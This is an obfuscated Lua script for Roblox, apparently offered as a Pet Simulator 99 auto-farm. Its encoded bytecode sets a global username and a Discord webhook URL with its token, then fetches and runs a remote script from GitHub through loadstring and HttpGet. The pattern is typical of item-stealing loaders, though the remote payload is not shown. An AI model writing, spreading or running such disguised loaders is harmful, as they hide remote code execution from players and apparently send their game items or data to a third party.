--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v98=v5(v86,v19);v19=nil;return v98;else return v86;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v87=0 -0 ;local v88;while true do if (v87==(0 -0)) then v88=(v31/((3 -1)^(v32-(2 -1))))%(((2258 -(1523 + 114)) -(555 + 64))^(((v33-((838 + 94) -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v88-(v88%((1 -0) + 0)) ;end end else local v89=2^(v32-(1 + 0)) ;return (((v31%(v89 + v89))>=v89) and 1) or (877 -(282 + 595)) ;end end local function v21()local v34=1065 -(67 + 1 + 222 + 775) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end if (v34==1) then return v35;end end end local function v22()local v36=(1137 -(67 + 113)) -(892 + 65) ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * (472 -216)) + v37 ;end if (v36==(0 -(0 + 0))) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + 2 ;v36=1;end end end local function v23()local v39=0 -(997 -(915 + 82)) ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * 16777216) + (v42 * 65536) + (v41 * (1017 -761)) + v40 ;end if (v39==(952 -(802 + 150))) then v40,v41,v42,v43=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v39=1 + 0 ;end end end local function v24()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(5 -3)) then v49=v20(v46,13 + (33 -25) ,40 -9 );v50=((v20(v46,1219 -(1069 + 118) )==((2 + 0) -1)) and  -1) or ((3 -2) -0) ;v44=1 + (7 -5) ;end if (v44==(0 -0)) then v45=v23();v46=v23();v44=1 + 0 ;end if (v44==(792 -(368 + 423))) then v47=3 -(861 -(814 + 45)) ;v48=(v20(v46,19 -(10 + 8) ,76 -56 ) * (2^(474 -(416 + 26)))) + v45 ;v44=6 -4 ;end if (v44==(2 + 1)) then if (v49==(0 -0)) then if (v48==((1079 -641) -(145 + 16 + 277))) then return v50 * (430 -(44 + 386)) ;else v49=1;v47=1486 -(998 + 488) ;end elseif (v49==(651 + 494 + 902)) then return ((v48==0) and (v50 * ((1 + 0)/(772 -(201 + 571))))) or (v50 * NaN) ;end return v8(v50,v49-(2161 -(116 + 1022)) ) * (v47 + (v48/(2^52))) ;end end end local function v25(v51)local v52;if  not v51 then v51=v23();if (v51==(885 -(261 + 624))) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1 -0) );v18=v18 + v51 ;local v53={};for v69=3 -2 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==(405 -(108 + 294))) then v61=nil;v62=nil;v54=1493 -(570 + 919) ;end if (v54~=0) then else v55=0;v56=nil;v54=1;end if ((2 -0)==v54) then v59=nil;v60=nil;v54=3;end if (v54==(812 -(569 + 242))) then v57=nil;v58=nil;v54=5 -3 ;end if (v54~=4) then else while true do if (2==v55) then v60=nil;v61=nil;v55=1 + 2 ;end if (v55~=1) then else v58=nil;v59=nil;v55=1026 -(706 + 318) ;end if (v55~=(1254 -(721 + 530))) then else v62=nil;while true do if (v56~=0) then else local v99=0;local v100;while true do if (v99==0) then v100=0;while true do if ((1273 -(945 + 326))==v100) then v56=1;break;end if (v100==0) then v57={};v58={};v100=2 -1 ;end if (v100~=1) then else local v158=0;while true do if (0==v158) then v59={};v60={v57,v58,nil,v59};v158=1;end if (1~=v158) then else v100=702 -(271 + 429) ;break;end end end end break;end end end if (v56==(2 + 0)) then local v101=0;while true do local v103=1500 -(1408 + 92) ;while true do if (v103==(1086 -(461 + 625))) then if (v101~=1) then else return v60;end if (v101==0) then for v159=1,v23() do local v160=0;local v161;while true do if (v160~=(1288 -(993 + 295))) then else v161=v21();if (v20(v161,1,1)==(0 + 0)) then local v166=0;local v167;local v168;local v169;local v170;local v171;while true do if (v166==(1171 -(418 + 753))) then v167=0;v168=nil;v166=1 + 0 ;end if (v166==(1 + 0)) then local v174=0 + 0 ;while true do if (v174~=(1 + 0)) then else v166=2;break;end if (v174~=(529 -(406 + 123))) then else v169=nil;v170=nil;v174=1770 -(1749 + 20) ;end end end if ((1 + 1)~=v166) then else v171=nil;while true do if (v167==0) then v168=0;v169=nil;v167=1323 -(1249 + 73) ;end if (1~=v167) then else local v179=0;while true do if (v179~=1) then else v167=1 + 1 ;break;end if (v179==(1145 -(466 + 679))) then v170=nil;v171=nil;v179=2 -1 ;end end end if (v167==(5 -3)) then while true do if (v168==(1901 -(106 + 1794))) then local v181=0 + 0 ;local v182;local v183;while true do if (v181==(1 + 0)) then while true do if (0==v182) then v183=0 -0 ;while true do if (v183==(0 -0)) then v171={v22(),v22(),nil,nil};if (v169==0) then local v197=0;local v198;while true do if (v197~=(103 -(17 + 86))) then else v198=0 + 0 ;while true do if (v198==(0 -0)) then v171[8 -5 ]=v22();v171[4]=v22();break;end end break;end end elseif (v169==1) then v171[169 -(122 + 44) ]=v23();elseif (v169==2) then v171[5 -2 ]=v23() -((6 -4)^(14 + 2)) ;elseif (v169==3) then local v207=0 + 0 ;local v208;while true do if (v207~=(0 -0)) then else v208=65 -(30 + 35) ;while true do if ((0 + 0)~=v208) then else v171[1260 -(1043 + 214) ]=v23() -((7 -5)^(1228 -(323 + 889))) ;v171[10 -6 ]=v22();break;end end break;end end end v183=581 -(361 + 219) ;end if (v183~=(321 -(53 + 267))) then else v168=2;break;end end break;end end break;end if (v181==0) then v182=0;v183=nil;v181=1;end end end if (v168==(1 + 1)) then local v184=0;local v185;local v186;while true do if (v184~=(413 -(15 + 398))) then else v185=0;v186=nil;v184=983 -(18 + 964) ;end if ((3 -2)==v184) then while true do if (v185~=(0 + 0)) then else v186=0 + 0 ;while true do if (v186==(850 -(20 + 830))) then local v195=0 + 0 ;while true do if (v195==(126 -(116 + 10))) then if (v20(v170,1 + 0 ,739 -(542 + 196) )==(1 -0)) then v171[2]=v62[v171[2]];end if (v20(v170,2,2)==(1 + 0)) then v171[2 + 1 ]=v62[v171[3]];end v195=1;end if (1==v195) then v186=1 + 0 ;break;end end end if (1==v186) then v168=3;break;end end break;end end break;end end end if (v168==0) then local v187=0;local v188;local v189;while true do if ((0 -0)==v187) then v188=0;v189=nil;v187=2 -1 ;end if (v187~=(1552 -(1126 + 425))) then else while true do if (v188~=0) then else v189=405 -(118 + 287) ;while true do if ((3 -2)==v189) then v168=1122 -(118 + 1003) ;break;end if (v189~=0) then else local v196=0 -0 ;while true do if (v196~=1) then else v189=1;break;end if ((377 -(142 + 235))==v196) then v169=v20(v161,9 -7 ,3);v170=v20(v161,4,6);v196=1;end end end end break;end end break;end end end if (v168==(1 + 2)) then if (v20(v170,3,980 -(553 + 424) )==(1 -0)) then v171[4]=v62[v171[4 + 0 ]];end v57[v159]=v171;break;end end break;end end break;end end end break;end end end for v162=1,v23() do v58[v162-(1 + 0) ]=v28();end v101=1;end break;end end end end if (v56==1) then local v102=0 + 0 ;while true do if (2~=v102) then else v56=2;break;end if (v102==(1 + 0)) then for v146=1 + 0 ,v61 do local v147=0;local v148;local v149;local v150;local v151;local v152;while true do if (v147==1) then v150=nil;v151=nil;v147=4 -2 ;end if ((5 -3)==v147) then v152=nil;while true do if (v148==(0 -0)) then local v164=0 + 0 ;while true do if (v164==(4 -3)) then v148=754 -(239 + 514) ;break;end if (v164==(0 + 0)) then v149=1329 -(797 + 532) ;v150=nil;v164=1 + 0 ;end end end if (v148~=(1 + 1)) then else while true do if (v149==1) then v152=nil;while true do if (v150==(2 -1)) then if (v151==1) then v152=v21()~=0 ;elseif (v151==2) then v152=v24();elseif (v151==3) then v152=v25();end v62[v146]=v152;break;end if (v150~=0) then else local v176=0;local v177;local v178;while true do if (v176~=(1202 -(373 + 829))) then else v177=0;v178=nil;v176=1;end if (v176==1) then while true do if (v177==0) then v178=0;while true do if (v178==0) then local v193=0;while true do if (1==v193) then v178=732 -(476 + 255) ;break;end if (v193==(1130 -(369 + 761))) then local v194=0 + 0 ;while true do if (v194~=(0 -0)) then else v151=v21();v152=nil;v194=1 -0 ;end if (v194==(239 -(64 + 174))) then v193=1;break;end end end end end if (v178~=1) then else v150=1;break;end end break;end end break;end end end end break;end if (v149==(0 + 0)) then local v172=0 -0 ;local v173;while true do if ((336 -(144 + 192))==v172) then v173=216 -(42 + 174) ;while true do if ((1 + 0)==v173) then v149=1 + 0 ;break;end if (v173~=(0 + 0)) then else local v180=1504 -(363 + 1141) ;while true do if (v180==(1580 -(1183 + 397))) then v150=0;v151=nil;v180=2 -1 ;end if (v180==1) then v173=1 + 0 ;break;end end end end break;end end end end break;end if (v148~=(1 + 0)) then else local v165=0;while true do if (v165~=(1976 -(1913 + 62))) then else v148=2 + 0 ;break;end if (v165==0) then v151=nil;v152=nil;v165=2 -1 ;end end end end break;end if (v147==(1933 -(565 + 1368))) then v148=0;v149=nil;v147=1;end end end v60[3]=v21();v102=7 -5 ;end if (v102~=0) then else v61=v23();v62={};v102=1662 -(1477 + 184) ;end end end end break;end if (v55~=0) then else local v97=0 -0 ;while true do if (v97==1) then v55=1 + 0 ;break;end if (v97==(856 -(564 + 292))) then v56=0;v57=nil;v97=1 -0 ;end end end end break;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v71=v66;local v72=v67;local v73=v68;local v74=v27;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v90=0,v79 do if (v90>=v73) then v77[v90-v73 ]=v78[v90 + 1 ];else v81[v90]=v78[v90 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=8) then if (v84<=3) then if (v84<=1) then if (v84>0) then do return;end else local v104=0;local v105;while true do if (0==v104) then v105=v83[2];v81[v105]=v81[v105](v13(v81,v105 + 1 ,v76));break;end end end elseif (v84==2) then v81[v83[2]][v83[3]]=v83[4];else local v108=v83[2];v81[v108]=v81[v108](v13(v81,v108 + 1 ,v76));end elseif (v84<=5) then if (v84>4) then local v110=v83[2];local v111=v81[v83[3]];v81[v110 + 1 ]=v111;v81[v110]=v111[v83[4]];else local v115=v83[2];local v116=v81[v83[3]];v81[v115 + 1 ]=v116;v81[v115]=v116[v83[4]];end elseif (v84<=6) then do return;end elseif (v84>7) then v81[v83[2]]=v83[3]~=0 ;else v81[v83[2]]();end elseif (v84<=12) then if (v84<=10) then if (v84==9) then v81[v83[2]][v83[3]]=v83[4];else v81[v83[2]]();end elseif (v84==11) then local v122=v83[2];local v123,v124=v74(v81[v122](v13(v81,v122 + 1 ,v83[3])));v76=(v124 + v122) -1 ;local v125=0;for v129=v122,v76 do v125=v125 + 1 ;v81[v129]=v123[v125];end else v81[v83[2]]=v83[3];end elseif (v84<=14) then if (v84>13) then v81[v83[2]]=v83[3]~=0 ;elseif ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end elseif (v84<=15) then if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end elseif (v84>16) then local v140=v83[2];local v141,v142=v74(v81[v140](v13(v81,v140 + 1 ,v83[3])));v76=(v142 + v140) -1 ;local v143=0;for v155=v140,v76 do v143=v143 + 1 ;v81[v155]=v141[v143];end else v81[v83[2]]=v83[3];end v75=v75 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703083O00757365726E616D6503083O0054616F6C6F6E677903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3139333832373334383038353231393332382F6F4B684F6F2D654A39716C5F536757714C376F7A672D79566431507969553338617366483852747A4D78534B694D524E31716C487051474B78517A6C654F4C4F4746306F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50532O392F6D61696E2F50657453696D756C61746F722O394175746F4661726D2E6C7561000D3O00120F3O00013O0030093O0002000300120F3O00013O0030093O0004000500120F3O00063O00120F000100073O00200400010001000800120C000300094O0008000400014O000B000100044O00035O00022O000A3O000100012O00013O00017O00",v9(),...);
